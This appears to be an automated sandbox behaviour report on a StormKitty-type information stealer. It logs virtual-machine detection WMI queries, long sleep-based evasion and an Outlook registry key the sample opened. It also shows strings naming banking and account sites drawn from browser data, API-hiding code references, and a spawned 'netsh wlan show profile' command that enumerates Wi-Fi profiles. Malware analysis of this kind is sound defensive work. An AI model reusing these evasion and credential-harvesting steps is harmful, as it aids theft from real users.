Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: StormKittyXZeroTrace.exe.bin.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: StormKittyXZeroTrace.exe.bin.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: StormKittyXZeroTrace.exe.bin.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: winload_prod.pdb source: Temp.txt.0.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr

Source: StormKittyXZeroTrace.exe.bin.exe

Static PE information: 0xAFE7C4AA [Mon Jul 9 10:19:22 2063 UTC]

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

Code function: 0_2_0535DA4C pushfd ; iretd

0_2_0535DA4D

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Memory allocated: 3150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Memory allocated: 3300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Memory allocated: 5300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Memory allocated: 8720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Memory allocated: 9720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Memory allocated: 98F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Memory allocated: A8F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Window / User API: threadDelayed 3728			Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Window / User API: threadDelayed 5943			Jump to behavior

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe TID: 6208

Thread sleep time: -37815825351104557s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user~1\	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Temp\8.46.123.189\	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user~1\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user~1\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Temp\8.46.123.189\Directories\	Jump to behavior

Source: StormKittyXZeroTrace.exe.bin.exe	Binary or memory string: VMware
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partitioni
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service#
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisorr
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83C9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus PipeslD
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processory
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partition
Source: chrome.exe, 0000000A.00000002.1078001852.000016F401748000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=e8e30462-f11f-4913-9d2c-10fbb3f8ae76
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83C9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partition
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83C9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes/
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: chrome.exe, 0000000A.00000002.1061282155.000001CFFBB48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V ggotovlyaanalcu Bus Pipes
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83C44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V ggotovlyaanalcu Bus3
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CC1000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 0000000A.00000002.1078188119.000016F4017D8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware Virtual USB Mouse
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: chrome.exe, 0000000A.00000002.1059481843.000001CF87790000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partition
Source: chrome.exe, 0000000A.00000002.1061282155.000001CFFBB48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processor.muisC
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: chrome.exe, 0000000A.00000002.1059481843.000001CF87790000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid PartitionC
Source: chrome.exe, 0000000A.00000002.1061282155.000001CFFBC30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Servicenat
Source: chrome.exe, 0000000A.00000003.1014901680.000016F400314000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Hypervisor Root Partition4
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: StormKittyXZeroTrace.exe.bin.exe	Binary or memory string: Hyper-V Video
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1083593548.0000000001563000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1061282155.000001CFFBB48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processor
Source: chrome.exe, 0000000A.00000002.1079509288.00007FFBED171000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: xVMcI
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83C32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83CC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2Hyper-V VM Vid Partitionll
Source: StormKittyXZeroTrace.exe.bin.exe	Binary or memory string: VMware Virtual
Source: tmp1B46.tmp.dat.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: chrome.exe, 0000000A.00000002.1056158883.000001CF83C9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partition$

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: StormKittyXZeroTrace.exe.bin.exe, ImportHider.cs	Reference to suspicious API methods: LoadLibrary(dllName)
Source: StormKittyXZeroTrace.exe.bin.exe, ImportHider.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(intPtr, methodName), typeof(T))
Source: StormKittyXZeroTrace.exe.bin.exe, LockHelper.cs	Reference to suspicious API methods: Interop.Kernel32.OpenProcess(Interop.ProcessAccessFlags.DuplicateHandle, bInheritHandle: true, (uint)targetPid)

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
